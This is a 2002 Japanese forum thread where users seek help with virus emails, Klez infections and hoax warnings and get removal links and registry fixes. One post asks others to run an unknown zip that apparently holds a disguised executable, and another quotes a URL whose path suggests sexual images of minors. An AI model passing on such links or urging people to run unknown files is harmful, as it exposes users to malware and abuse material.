金が余ってるなら、明日店行ってFinalDataスタンダードを買う。
何かダウンロードすれば消えたファイルが上書きされてしまうから。
説明
ttp://www.vector.co.jp/soft/win95/util/se146609.html
製品シリーズ、HP
ttp://www.finaldata.ne.jp/finaldata.html

363 :名無しさん@お腹いっぱい。:02/06/29 22:10
レジストリがどれほど乱雑になってるか見てみるために、
これを使ってみて下さい。納得できたらクリーニングソフトなりを探す。
レジストリ分析ソフト
ttp://www.vector.co.jp/soft/win95/util/se097083.html

364 :名無しさん@お腹いっぱい。:02/06/29 22:11
>>363
PCの不具合に悩む人に。

365 :名無しさん@お腹いっぱい。:02/06/29 23:10
tp://ime.nu/yahoo5briefcase.vr9.com/preteen/__tn___________kidsux.jpg
を見ようとしましたが、リンク切れ(?)で見れませんでした。
しかし、その後PCの未使用ポートが勝手にアクセスしようとしてます。
ウイルスですかね?
また駆除方法ってありますか?
ちなみに"Winstart.bat"というファイルはありません。

よろしくお願いします


366 :名無しさん@お腹いっぱい。:02/06/29 23:17
>>365
>ウイルスですかね?
違う

367 : :02/06/29 23:20
>>365
訳のわからん問いかけはやめろ

368 :名無しさん@お腹いっぱい。:02/06/29 23:24
>>366
>>367
ありがとうございます。


369 :名無しさん@お腹いっぱい。:02/06/30 00:23
検索してみたけどいまいち分からないのでどなたか教えて下さい。
gooのフリーメール使ってます。KLEZとかあほみたいにいっぱい来ます。
で、そんなウイルスメールはサクサク消してるんですが、
最近件名が日本語の物がよく来るんです。『もう少し』とか色んな言葉で。
開いてもエラーになるのでそのまま削除してますけど、
これもウイルスメールなんでしょうか?
今日は『Honey 【重要】 フィルタルールによっ て、メールの送信が行われませんでした 』
という件名のメールが来て、
開くと本文は全て文字化け(数字とアルファベットの羅列)みたいな状態でした。
添付ファイルはありません。
いかにも送信出来ませんでしたな感じですが、
gooのFAQには送信出来なかった場合のメッセージについては書いてなかったし。
ウイルスメールが多いだけに何がなんだか良く分からなくなってしまいました。
こんなウイルスメールもあるんでしょうか?

370 :名無しさん@お腹いっぱい。:02/06/30 00:58
>>369
開いて表示してる画面で右クリックしてソースを表示させる。
なにかわかるかもね。

371 :  :02/06/30 01:31
ウィルスメールの可能性が高いけど、
実物みているのはアナタだけなんで、第三者には断言できません。
数字とアルファベットの羅列て事は、
添付書類のデコードが巧く行かなかったて事でしょう。

372 :369:02/06/30 11:44
>>370
>>371
ありがとうございます。
確かにいくら説明しても見ている私しか分からないことですよね・・・。

とりあえず日本語のはどれもまともに開かないメールなんで、
深く考えない事にします。
送信出来なかったというメールも身に覚えがないし。
371さんに言われてそういやそうだなと思いました。(数字とアルファベットの羅列)

お尋ねしておいて自分で勝手に納得してごめんなさい。
ありがとう。

373 :名無しさん@お腹いっぱい。:02/07/01 09:57
差出人がmfjmr タイトルがInternet Explorer(IE) というメールと
差出人xxx  タイトルLet's be friends  というメールが来たんだけど
どちらも添付ファイルはなし、けどサイズが130kb程ある。
yahoo!のメール使ってるんだけど開いて見てみてもも大丈夫ですか?

374 :名無しさん@お腹いっぱい。:02/07/01 10:03
>>373
やめた方がいいと思うが。

375 :ふしんメール:02/07/01 12:38
373さんと似たような問題なんですが、、、

差出人:ryo タイトル:cellpadding /131k
差出人:blader タイトル:onmouseover /138k

添付ファイル無し。サイズが大きく
タイトルがHTML関連の言葉らしいので、なんだか怪しいです。

自宅にて、ホットメールの受信トレイのプレビューで確認しました。

まだ怖くて開いていませんが、インターネットカフェで開いてみようかと
思っています。その場合でも、
パスワード等の流出の可能性があるウィルスではないかと心配です。

開いてみても大丈夫でしょうか?


376 :名無しさん@お腹いっぱい。:02/07/01 13:30
・ウィルスでしょうか → アンチウィルスソフト常駐させよ。
・「開いてみて大丈夫でしょうか → 同上、件名・送信者名だけでウィルスの
種類がわかるのは今では少数派。
・感染したのでしょうか → オンラインウィルススキャンしろ。

377 :名無しさん@お腹いっぱい。:02/07/01 14:39
>>375
捨てればいいでしょう。興味本位で開いてカフェのPCを感染させたら関係ない
人間にウィルスがおくられるよ。

378 :名無しさん@お腹いっぱい。:02/07/01 16:28
>>375-376
感染している可能性を知りつつネットカフェでメールを開きPCに感染させ
た場合、故意または重大な過失があるのでネットカフェに損害を賠償する
必要があります。
故意の場合には威力業務妨害などの刑法犯にもなります。

379 :名無しさん@お腹いっぱい。:02/07/01 16:41
>>375
自分のPCでは開きたくないメールも他人のPCでは平気なのか?
自己中もここまでくると呆れて物も言えんわ。

380 :名無しさん@お腹いっぱい。:02/07/01 19:08
>>379

正論だね・・・

381 :375:02/07/01 20:46
返答ありがとうございます。
パニックになってしまったが為の
衝動的で理性を失った言動をお許し下さい。

インターネットカフェでは調べません。
内容が、就職活動先の企業のものかもしれませんが、
タイトルだけ見ると怪しそうなので、素直に削除します。

382 :名無しさん@お腹いっぱい。:02/07/01 21:10
>>381
>内容が、就職活動先の企業のものかもしれませんが
それはない。

383 :名無しさん@お腹いっぱい。:02/07/01 21:55
>>379-380
著作権無視して商売やってるネットカフェなんかどうでもいいだろ。

384 :名無しさん@お腹いっぱい。:02/07/01 22:38
>>383
そこからウィルスがばら撒かれることについては?

385 :名無しさん@お腹いっぱい。:02/07/01 22:46
他の板でこんなのを見つけたのですが…

>通称2chウィルス(正式名称はしらない)
>C:\WINDOWS\SYSTEMの中にsage.exeっていうのがあれば感染してる。
>ひろゆきにメールを送ればワクチンを送ってくれるってさ。
>ちなみに放っておいても実害は全く無いよ。
>普通に書き込みしたつもりが、10回に1回の確率でsageになるらしい。
>削除したりしたらダメだよ。
>変にいじると悪化するからね。
>放っておくのが一番だってさ。

…今見てみたらありました…ショックです。
これは本当なのでしょうか?

386 :名無しさん@お腹いっぱい。:02/07/01 22:50
ネタです。www


387 :名無しさん@お腹いっぱい。:02/07/02 00:08
超初心者の質問なのですが、さっきメール一通来てたんで
なんとなくリズミカルにあっという間に開いてしまったのですが、
なんかクリップ付いてるしこれってウイルス??!!ってアセりまくって
もうなにがなんだか怖すぎて削除して、ごみ箱もいっきに空にしてしまって
よく見ませんでした
今のところPCにはなにも起こってないのですが、これからどうなるんでしょうか?
それと、どうすればいいのー?!
明日の朝サポートセンターに電話できるまで待てません。。。

388 :名無しさん@お腹いっぱい。:02/07/02 00:10
>>387
>>1にあるけどな、Antidote簡易版入れてチェックしろ。

389 :名無しさん@お腹いっぱい。:02/07/02 00:11
>>387
感染してるときは他のPCに感染るのでカキコしないでください!

390 :名無しさん@お腹いっぱい。:02/07/02 00:14
>>387
直接載せてやるよ。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

391 :名無し@ヘルプ:02/07/02 00:24
すみません。ウィルス・メールをあけてしまい、それ以来
パソを立ち上げる時、「メモリ不足のため QKD1A2.EXEを
読み込めません〜」のエラー・メッセージが出てくるのです。
.EXEの前の番号はその時どきによって異なります。
でも、何も問題ないだろうと思い、2〜3週間ほったらかしにしてました。

昨日、友人や親から私のメールでウィルスが送られてくるという苦情
をもらい、さっきノートン・アンチ・ウィルスを試してみたのですが、
全く効きません。どなたか対処法を教えてください。
ちょっとパニくって文章がまとまりないですが、よろしくお願いします。

392 :名無しさん@お腹いっぱい。:02/07/02 00:26
>>391
文章はまとまってるな。

393 :名無しさん@お腹いっぱい。:02/07/02 00:27
>>391
キミも>>390をDLして使う。

394 :名無しさん@お腹いっぱい。:02/07/02 00:28
>>391
そして必要時以外ネットを切断すること。

395 :名無しさん@お腹いっぱい。:02/07/02 00:35
>>391
ちなみに試したノートンはもともと常駐させてたものか?
違うだろう。オンラインチェックでなくて、新しくインストールしたなら、
ウィルスによって無効化された可能性もある。アンチドートで検出できたらその後
種類をサイトで調べておいた方がいいかも。

396 :名無し@ヘルプ:02/07/02 00:43
>393
DLしました。今から試してみます。
>394
繋げていると・・・・ダメなんですか
>395
>>ウィルスによって無効化された可能性もある。

多分、そうだと思います。わかりました。種類を調べます。

397 :対策せよ!:02/07/02 00:54


398 :名無しさん@お腹いっぱい。:02/07/02 00:55
>>396
つないでいる間に勝手にウィルスが送信されるからさ。
他人を巻き添えにしないこと。

399 :結果を報告せよ!!!!!:02/07/02 01:04
>>396

400 : :02/07/02 01:11
ノートン博士が400getした模様です・・・・

401 :名無し@ヘルプ:02/07/02 01:33
ウィルスは検索できました
が、それら(すごい数だったのでびっくりです)を削除
できませんでした・・・・・



402 :名無し@ヘルプ:02/07/02 01:37
操作パスワードってなによ(涙)

明日、仕事なのに今日も寝れないなんて

403 :名無しさん@お腹いっぱい。:02/07/02 01:38
>>402
パスワードを入力すると操作できるようになるんだね、きっと。

404 :名無しさん@お腹いっぱい。:02/07/02 01:41
>>401
いかん、笑える。種類は?削除できなかったものの居場所は?処理方法は?

405 :名無しさん@お腹いっぱい。:02/07/02 01:42
オンラインスキャン?で検索したら「感染なし」だったのですが、
それでもまだ潜伏してることもありますか?
387です。

406 :名無しさん@お腹いっぱい。:02/07/02 01:44
>>405
圧縮ファイルだとかは検知できないこともあるよ。

407 :名無し@ヘルプ:02/07/02 01:45
インストールしたのにプログラムの中にフォルダができてないんです
なぜでしょうか

普通、その中にパスワードって入っているのではないかと・・・・

408 :名無しさん@お腹いっぱい。:02/07/02 01:47
>>407

何をインストールしたの?

409 :名無し@ヘルプ:02/07/02 01:49
390さんが書かれたものです

410 :名無しさん@お腹いっぱい。:02/07/02 01:50
仕事で使うんじゃなきゃ電源切ってあしたソフト買ってくるかどうか
したら?

411 :名無しさん@お腹いっぱい。:02/07/02 01:51
>>ヘルプ
どこのファイルが削除できないのかな?

412 :名無しさん@お腹いっぱい。:02/07/02 01:52
ウィルスの種類がわかる?

413 :名無し@ヘルプ:02/07/02 01:53
でもノートンが効かないんじゃ・・・

414 :名無しさん@お腹いっぱい。:02/07/02 01:55
>>413
おもなウィルスには専用の駆除ツールがあるけど、名前わからない?

415 :名無し@ヘルプ:02/07/02 01:55
>411

Cドライブの中のものです

>412

I-Worm.Klez.e

となっております



416 :名無しさん@お腹いっぱい。:02/07/02 01:58
よし、これだ。OSは何?MEかXPだったら言って。
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html

417 :名無し@ヘルプ:02/07/02 01:58
MEです!

418 :名無しさん@お腹いっぱい。:02/07/02 02:00
>>417
読めばわかるかも、だが、復元機能を停止させてからツールを使う。
セーフモード起動はわかる?

419 :名無し@ヘルプ:02/07/02 02:00
わかります

420 : :02/07/02 02:00


421 :名無しさん@お腹いっぱい。:02/07/02 02:02
>>419
あとはDLして説明通りに実行。

422 :名無しさん@お腹いっぱい。:02/07/02 02:04
これで寝れるな。

423 :名無しさん@お腹いっぱい。:02/07/02 02:12
http://www.hellplant.org/cgi-bin/uploader/zenecro68xx/514.zip
これなに?
誰か実行してよ。
マンキンが怖くて俺には無理

424 :名無しさん@お腹いっぱい。:02/07/02 02:13
>>423
誰が・・・

425 :名無しさん@お腹いっぱい。:02/07/02 02:13
>>423
まだ試作段階です。
基本的なことは出来ると思います。

426 :名無しさん@お腹いっぱい。:02/07/02 02:23
>>423
yuki.exe のプロパティ

正式ファイル名:GTA3_CHEAT.exe

427 :名無しさん@お腹いっぱい。:02/07/02 09:35
昨日からWindowsのフォルダが”詳細”だと一切見れなくて(”一覧”"アイコン”だと見れる)
ウイルス感染?とか思ってますがそんなウイルスあります?

窓自体のトラブルかな?

428 :名無しさん@お腹いっぱい。:02/07/02 09:38
>>427
ウイルス感染? → ウィルスチェックしろ

429 :419:02/07/02 12:25
遅れましたが、みなさんどうもありがとうございました。

430 :KlezE:02/07/02 12:31
Received:from imfep02.kcom.ne.jp (210.174.120.146)
by ** with SMTP; **
Received:from Wwcvk ([211.133.14.132]) by imfep02.kcom.ne.jp
(InterMail vM.4.01.03.00 201-229-121) with SMTP id < 20020702003727_ZDCO18281_imfep02_kcom_ne_jp@imfep02.kcom.ne.jp >
for < mail@sg-mark.org >; **
From:wink< wink@pk.highway.ne.jp >
To: 211_133_14_132_Virus_Deleted@imfep02.kcom.ne.jp
nttkngw07132_ppp_infoweb_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
wink_at_pk_highway_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp
Subject:ENTIRE AGREEMENT
Message-Id:< 20020702003727_ZDCO18281_imfep02_kcom_ne_jp_Wwcvk@imfep02.kcom.ne.jp >
Date**

添付ファイル
file.html
of
file.txt
PLAYRLIC.TXT

431 :名無しさん@お腹いっぱい。:02/07/02 13:56
hotmailに件名「VALUE」で140kの
メールが届きました。
しかし、メールの内容は何もありませんでした。
これって何ですか?


432 : :02/07/02 14:15
>>431
しらん

433 :431:02/07/02 15:10
それでは、問題無いということで・・・

434 :名無しさん@お腹いっぱい。:02/07/02 15:26
>>430
てめえはいろんなスレでマルチすんな。

435 :感染したのか:02/07/02 17:01
添付ファイル付の不明なメールが届いてたので、
即ゴミ箱行きにしたんですが、
再起動させると、マイコンピュータやゴミ箱やIE、OUTLOOK等以外の
ファイルが全て消えてしまいました。
で、マイコンピュータを開こうとすると
「現在のセキュリティ設定では、このページのActiveXコントロール
は実行できません。そのため、このページは表示できない可能性があります」
というメッセージが出てファイルが一切表示されません。
窓の下の方に○個のオブジェクトとは表示されているんですが・・・
safeモードで起動するとファイルは見えるんですが
フロッピーにコピーすることも出来ません。
既に全てのファイルは削除されてしまったんでしょうか・・・
スタートボタンを押しても反応ないし、
本当に困りました・・・どなたかアドバイスを・・・


436 :名無しさん@お腹いっぱい。:02/07/02 17:09
>>435
Outlook ExpressのプレビューはOFFにしていたか?Internet Explorerのバージョンは?
プレビューで感染した可能性がある。ウィルススキャン汁。

437 :感染したのか:02/07/02 18:01
>>436
もはやマイコンピュータをクリックすること
ぐらいしかできないんですよ。
開いても何も表示されないですけど・・・
今までウィルスとは無縁だったんで、
全く対策してなかったのがマズかったです。

仕事に影響及ぼしまくりで欝。


438 :名無しさん@お腹いっぱい。:02/07/02 18:21
>>435
http://www.watch.impress.co.jp/internet/www/article/2001/0820/ipa.htm
プライスロト系のやつかなぁ・・・・・・

439 :名無しさん@お腹いっぱい。:02/07/02 18:23
>>437
んで、対処法としてはこれ。http://www.nai.com/japan/virusinfo/virO.asp?v=JS/Offensive&a=O
復旧できる可能性は低いかもしれないです・・・・・

440 :名無しさん@お腹いっぱい。:02/07/02 18:26
>>437
トレンドマイクロ。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3097

まさかとは思うんだけど、アップデートとかはちゃんとしてた?

441 :名無しさん@お腹いっぱい。:02/07/02 18:51
あの〜ノートンアンチウィルス使ってるんですがさっきオートプロテクトが反応して
ファイル名が出てこのファイルはJS何とかに感染しています。
と出て「ファイルへのアクセスが拒否されました」
「このファイルは修復できません」というのが交互に1,2回出て消えてしまいました。
この後コンピューターのスキャンを行ったのですが反応なしでした
修復できなかったファイルはどこへ行ったのか安心していいのか?
誰か教えてください!!

442 :cheshire-cat:02/07/02 18:56
>>435
レジ改変系は、Win98やMeならscanreg /restoreで一発復旧可能な予感。

>>441
検疫されたなら。
\Norton SystemWorks\Norton Antivirus\Quarantineの中に、拡張子変えて保管されているかと。

443 :名無しさん@お腹いっぱい。:02/07/02 19:19
>>442
ないんですそれが・・・。オートプロテクトの設定をウィルスを見つけたら
自動的に修復する、で修復できなかったのがどうなるかわからないんです。
ウィルス名は JS.Exception.Exploit でした。

444 :cheshire-cat:02/07/02 19:30
>>443
411の人ですよね?
状況書いてもらわんと、答えようが無いんですが。
削除されてしまったんでは?

変なサイト見ていて、仕込まれていたジャバスク系ウイルスでいきなり警告って奴でしょうか?
「自動的に修復する」→「修復失敗」でしたか?その後何しました?隔離・削除?

IEのキャッシュを空にすると削除されてしまうだけだし。
ブロックされたなら心配無いような気がするんですが。
とりあえず電話番号とブラウザを起動した時に最初に表示されるページが改変されているかどうか、チェックするようにお勧めします。


445 :411:02/07/02 19:46
>>444
はい。修復失敗の後そのノートンのウィンドウは閉じてしまいました
最初のページも変わっていませんし電話もだいじょぶです
でも2chの入り口のつぼが表示されません・・・。

446 :名無しさん@お腹いっぱい。:02/07/02 19:47
>>435は氏んだのか? みんなが答えてるのにバージョン等の質問にも答え
ず、グチったまま逝ってしまったか。

447 :cheshire-cat:02/07/02 19:50
>>411
OS何っすか?
98SEやMeならscanreg /restoreで一瞬で解決しますけど。

というか、それ系のジャバスクウイルスって、ホームページ改変と電話番号改変以外の罠ってまず仕込まないんですよね。
ブロックできたなら、それでいいんじゃないでしょうか、とりあえず。

というか該当サイトはどゆとこなんでしょうか。捨て名なんだから、書いても恥にならないって思うんですが。

448 :cheshire-cat:02/07/02 20:07
>>446
scanreg /restoreが無理なら、「マイコンピューターゾーン」を表示させてデータを退避って手もあったのになぁ。

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
0x00000021(33) → 0x00000001(1)
( )内の数字は10進法表示にて


449 :411:02/07/02 20:09
>>447は私宛ですよね
ttp://www.abr200x.gr.jp/link/01/0002/00.htm
というエロサイトです。
ウィルスの情報を見るとプログラムファイルに潜り込むって
書いてありました(ノートンのウィルス情報より)
OSはXPです。何しろ初めてなもので・・。

450 :cheshire-cat:02/07/02 20:24
>>411
そこ見たけど、nortonにヒットしないし、それ系のは見つからないんですが。
どっか前後に見た他のサイトなんじゃないでしょうか。

というか、OS何っすか。

451 :411:02/07/02 20:39
>>450
そうなんですか・・・。今日は始めてそこにアクセスして画像見てたら
出てきたもので・・・。OSはXPです。
でももうスキャンしても出てこないんですよ・・・?なぜか。
変わったのはお気に入りに変なサイトが入っていました。もう消したんだけど。
今からちょっと出かけてきます質問しておいてすみません、ホントに。

452 :cheshire-cat:02/07/02 20:42
>>411
ブロックされたなら、ええやん。
って書いときます。

453 :名無しさん@お腹いっぱい。:02/07/02 20:45
>>451
>>441を見る限りでは感染はしてなさそう。
ブラウザのキャッシュに反応して修復失敗後、自動で削除したんじゃないでしょうか。

454 :411:02/07/02 20:47
みんなありがとう!!では行ってきます。
ここの人は親切な人ばかりだね!!

455 :名無しさん@お腹いっぱい。:02/07/02 20:49
>>454
へへっよせやい!照れくさいだろ

456 :名無しさん@お腹いっぱい。:02/07/02 23:50
今日仕事から帰ってきたら親父がPCの前で大騒ぎしていた。
なんでも、「jdbgmgr.exe」という熊のアイコンのウイルスに感染したから
削除したらPCがおかしくなった、と。
そりゃま、また突然やなあと、とりあえず、ノートンからの警告かと尋ねたら
いや、友人からのメールでな、と。
はあ?と思ったんで、とりあえず開きっぱなしになってたメールを読んで
みたら怪しいの何の。いたずらメールちがうの、とたずねたら、
いや、そんな事する奴じゃない、とか言って、またどないかしろしろとパニック
になってるから、とりあえず「jdbgmgr.exe」がなにか Googleで調べたら
何か判るかもしれないと思ったら案の定・・
思わず大笑いしてしまったよ。初めキョトンとしてた親父も恥ずかしそうに
苦笑いしていた。めったに拝めない姿だから、正直また爆笑してしまった。
引退したとはいえ元システム管理の人間でさえ引っかかってしまうとは
恐るべし、デマウイルス。
その親父の友人も相当焦っていたらしく、カーボンコピーで他人のメール
アドレス晒しまくり。迷惑なことだ。

キシュツだったらごめん

457 :名無しさん@お腹いっぱい。:02/07/02 23:54
で?

458 :名無しさん@お腹いっぱい。:02/07/02 23:55
jdbgmgr.exeのデマメールは禿しく既出だが
それにひっかかる元システム管理者は新しい

459 :名無しさん@お腹いっぱい。:02/07/02 23:56
さあ?

460 :暇人ですね。:02/07/03 00:20
>>434

461 :名無しさん@お腹いっぱい。:02/07/03 01:22
KLEZ.H付きのメールが送られてきました。
送られてきた時点ではそれだと気づかず、メールを見てしまいました。
でも添付ファイルは怪しかったので開きませんでした。
ちなみにメーラーはOutlook Express6です。
これって感染してるのでしょうか?
KLEZ.Hは奇数月の6日に発症するらしいので今のところ感染したのかどうか分かりません。
対処法を教えてくださいませ。

462 : :02/07/03 02:37
>>461
ネタはよそへ

463 :感染したのか:02/07/03 09:53
レスして頂いた皆さん、有難うございます。
仕事が立て込んでまして、返事が遅くなっていましました。
申し訳ありません。

今朝がた、皆様のアドバイスをもとに
色々と試してみました。

で、レジを数日前のものに戻すと・・・
な、何と!復活しました!!!!タ、タスカッタ

PCには無知なもので、
レジ関連の問題とすら気づきませんでした。
お騒がせしました・・・

昨日、デルのサポートセンターに連絡しても
そっけなく「OS再インストするしかない」と
言われたので、半ば諦めていたのですが、
初めてこの板を訪れた初心者の質問に快く答えて下さった
cheshire-cat さんを初めとするみなさんの
おかげで本当に助かりました。

これからはウィルス対策やPCについて、
もう少し勉強したいと思います。
本当に有難うございました!


464 :名無しさん@お腹いっぱい。:02/07/03 10:06
from:welcom<welcome@odn.ad.jp>
subject:A new game

<HTML><HEAD></HEAD><BODY>

<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>


PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました

PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
こんなメールがきました。どうすればいいですか?誰か助けてください。


465 :名無しさん@お腹いっぱい。:02/07/03 10:17
回線切って首(略

466 :名無しさん@お腹いっぱい。:02/07/03 11:13
>>464
そんなすぐに答が貰えるわけじゃなし、
初級ネット板にマルチポストにいったのはいただけない行為だな。
とにかく、>>1とか関連リンク見てみろよ。
アンチウイルスソフトでスキャンするのが最優先だろ?

467 :名無しさん@お腹いっぱい。:02/07/03 13:06
サイトを閲覧しただけで、そのサイトが感染していた場合、閲覧者のPCも感染してしまうという
ワームが少し前にはやったと思うのですが、そういったワームとFWの関係について質問があります。

FW&対ウィルスのauto-protectを有効にしているのですが
ワームのような強制メール配信のウィルスにかかってしまった場合、
FWはワームによってネットにアクセスしようとしていると、きっちり警告がでるのでしょうか?

一応環境を・・・
os w98
IE 6.0.2600.0000IC
OE使用
FW ゾヌ2.6.362
 セキュリティは高に、IEとかちゅだけ”接続許可”に設定
ノートン先生でauto-protect定義は毎週更新

よろしくお願いします

468 : :02/07/03 13:19
>>467
でる

469 :名無しさん@お腹いっぱい。:02/07/03 13:20
かもしれない

470 :467:02/07/03 13:56
>468-469
。・゚・(ノД`)・゚・。

471 :464:02/07/03 14:10
>466
おっしゃるとおりです
マルチポストという言葉を知りませんでした。
ちょっとあせってました。
みなさん不快な思いをさせて
申し訳ございませんでした。
このようなまちがった行為は
もういたしません。

472 : :02/07/03 15:05
>>464=>>471
どういう状況で心配しているのかよく分からないので、
一応、ここを読んでみて、
http://ime.nu/pcqa.tripod.co.jp/virus.htm
アンチウイルスソフトを持っていないなら、
シマンテックかトレンドマイクロのサイトでオンラインスキャン。
ポストペットを使っているようなので、
ここの
http://www.postpet.so-net.ne.jp/index_j.html
ウイルスについてとかお知らせも読んでおくこと。
スキャンして問題なければいいが、今後のためなど考えて
アンチウイルスソフトの導入はしておいた方がいいんじゃないか。
もし問題があったなら、シマンテックなりトレンドマイクロなりの
サイトでウイルス名など検索して対策を読む。

473 :名無しさん@お腹いっぱい。:02/07/03 15:17
つーか
わけわかんない英文メールなんて99%ウィルスなんだから
どうですか聞く前に消してしまえばいいでしょ
どうする必要も無い

ちなみに
http://home7.highway.ne.jp/mats/words/virus.htm

474 :464:02/07/03 15:30
>472、473
ありがとうございます。
じっくり読んでみます。

475 :名無しさん@お腹いっぱい。:02/07/03 17:22
HDDに不良クラスタを発生させるウィルスはあるんでしょうか?
HDDは5千時間ぐらい使用したもので、寿命かとも思うのですが、
異常になったときは丁度海外のサイトでmp3をダウンしてたもので、
タイミング的に少し気になります。
HDDの異常の状態はOS(W98)フリーズでHDDエンドレスアクセスでした。

476 :cheshire-cat:02/07/03 18:35
>>467
>FWはワームによってネットにアクセスしようとしていると、きっちり警告がでるのでしょうか?

ウイルス定義ファイルの更新が間に合わなくて、キッチリ感染したって前提で。
自動メル送信は、メーラーを利用したものなら、メーラーを常にAllow(許可)にしていなければ、警告は出る、と思うが。
メーラー使わず自力で送信するなら、「妙なアプリが外に出ようとしてるぞ、おい!」、って警告が出る。
Personal Fire Wallを停止させるvilliなら、上記のどちらでも警告は出ない。

>>475
SirCamなんかは、「結果的にHDをクラッシュさせる」けど。
わざと不良セクタ作らせるようなvilliは、漏れは知らない。

477 :Found virus WORM_KLEZ.E in file BORDER.pif:02/07/03 18:56
Received:from imlmta03.aics.ne.jp(157.205.253.215)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.132])
by imlmta03.aics.ne.jp (InterMail vM.5.01.03.13
201-253-122-118-113-20010918) with ESMTP id < 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@virmta04.aics.ne.jp >
for< nttkngw07132_ppp_infoweb_ne_jp_Virus_Deleted@imfep02.kcom.ne.jp >; **
Received: from Zpkjjgmy ([61.124.120.25]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@virmta04.aics.ne.jp >
for< 211_133_14_132_Virus_Deleted@imfep02.kcom.ne.jp >; **
From:customer< customer@sponichi.co.jp >
To: 20020703004602_IOPO18809_imlmta03_aics_ne_jp_Virus_Deleted@aso.aics.ne.jp
20020703004519.SPIT20864.virmta04.aics.ne.jp_Virus_Deleted@aso.aics.ne.jp ntkngw020025_isdn_ppp_infoweb_ne_jp_Virus_Deleted@zao.aics.ne.jp
61_124_120_25_Virus_Deleted@zao.aics.ne.jp
Subject: A very powful tool
Message-Id:< 20020703004519_SPIT20864_virmta04_aics_ne_jp_Virus_Deleted@imlmta03.aics.ne.jp >
Date**

Hello,This is a special powful tool
I hope you would like it.

------------------ Virus Warning Message (on the network)

Found virus WORM_KLEZ.E in file BORDER.pif
The file is deleted.

---------------------------------------------------------

478 :cheshire-cat:02/07/03 19:00
>>477
で?
From欄偽装するってのは、当然知ってるんだろうね?

479 :名無しさん@お腹いっぱい。:02/07/03 19:06
前にどっかでメモリだかCPUだかに電気的に負荷かけてダメージ与えるウィルス
作れないかってスレあったなあ。そん時の結論は、作れる可能性は0ではないが
正常動作させれる機種の幅がものすごく狭くて現実的じゃないとかだったかなあ

>>478
無視汁。

480 :cheshire-cat:02/07/03 19:09
>>479
は〜い(ちょい酔ってます)。

481 :名無しさん@お腹いっぱい。:02/07/04 00:23
>>456
最近になって、同じファイル名のウイルスも出てるから
話がややこしいですよ。

482 :名無しさん@お腹いっぱい。:02/07/04 00:28
>>475
不良セクタは作れないけど、不良セクタとしてマークするのは簡単。

483 :age:02/07/04 00:43


484 :名無しさん@お腹いっぱい。:02/07/04 04:46
ここでいいかわからないけど質問させて下さい。
PCを終了する時にウィルスを発見しましたって表示されて
慌ててバスターで検索したのですがみつかりませんでした。
最新にアップデートはしています。以前ウィルスにかかった
事があってワクチンを打った事があるのですが、それが関係
してるのでしょうか?それともバスターに引っかからない
ウィルスに感染しちゃってるのでしょうか?
終了時に感染の表示が出たのは1回だけでその後は普通に
終了出来てます。ご指導お願いします。

485 :名無しさん@お腹いっぱい。:02/07/04 04:49
>>484
それはバスターが感染を報告したの?

486 :名無しさん@お腹いっぱい。:02/07/04 04:54
こんな時間にありがとうございます。

バスターじゃありません。終了時に感染してます!って
表示が出たんです。

487 :名無しさん@お腹いっぱい。:02/07/04 04:57
winのエラーとか出るのと同じような表示でした

488 :ななし:02/07/04 05:43
ツール→メッセージルール→禁止された送信者にウィルスを送ってくる
人のメアドを登録したのにまだ送られてきます。他にないでしょうか?


489 : :02/07/04 07:14
>>486
名前は忘れたけど感染してる。
識者のレスを待つか、ひたすら検索せよ。

490 : :02/07/04 07:17
>>488
おそらくOEだと思うけど、送られてこなくなるわけじゃない。
送られてきたものが削除済みフォルダに入るだけ。

491 :名無しさん@お腹いっぱい。:02/07/04 07:18
>>488
メーラーはOEかな?サーバで削除っていう選択肢がなかったっけ?

492 :491:02/07/04 07:23
OEならあった。ツール→メッセージルール→メール で新規のメールルールってのが出る。
そこでいくつか条件を設定でき、「サーバから削除」を選べばいちいちDLしないで消せるはず。
条件設定をきちんとして他のメールは消さないよーに。

493 :名無しさん@お腹いっぱい。:02/07/04 07:48
>>491
OE 4.5だとないみたいです。ショボーン

494 :名無しさん@お腹いっぱい。:02/07/04 08:04
>>493 バージョンアップしる。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp

495 :名無しさん@お腹いっぱい。:02/07/04 08:07
>>486 バスターでスキャン汁。

496 :ういるこ:02/07/04 11:55
Received: from Rznhi (pl812.nas911.d-osaka.nttpc.ne.jp [210.139.91.44])
by mba.sphere.ne.jp (Postfix) with SMTP id 8148228CFE

Received: from Ate (pl360.nas911.d-osaka.nttpc.ne.jp [210.139.109.104])
by mba.sphere.ne.jp (Postfix) with SMTP id 3D60928CE0

497 :名無しさん@お腹いっぱい。:02/07/04 12:00
>484
漏れ、w2k使っててバスター入れてるけど、
2回くらいそういうのなったことある。
3ヶ月〜半年くらい前。
びっくりしてwindowsに戻って、バスターで検索かけても
何にも引っかからず<2回とも
結局今まで、原因はわからず。

パターンファイルはいつも最新にしてるし、
チェックも定期的にしてるんだがなあ。

参考にならずスマソ。

498 :名無しさん@お腹いっぱい。:02/07/04 12:23
父のパソコンがウイルスに感染しているので何とかしようと思い、
ウイルスバスターを入れようとしたのですが、
「容量がありません」と言われました。
空き容量は十分なので、ウイルスのせいだと思われるのですが、
仕方なくdos画面からスキャンしました。
すると、ウイルスを発見したのですが、
ウイルスバスターをインストールしてないので駆除ってできませんよね?
どうしたらよいのか教えてくださいませ。

ちなみに、そのパソコンにはノートンが入っているのですが、
とても古いために使い物になりません。
ネットに接続してないのでアップデートもできません。
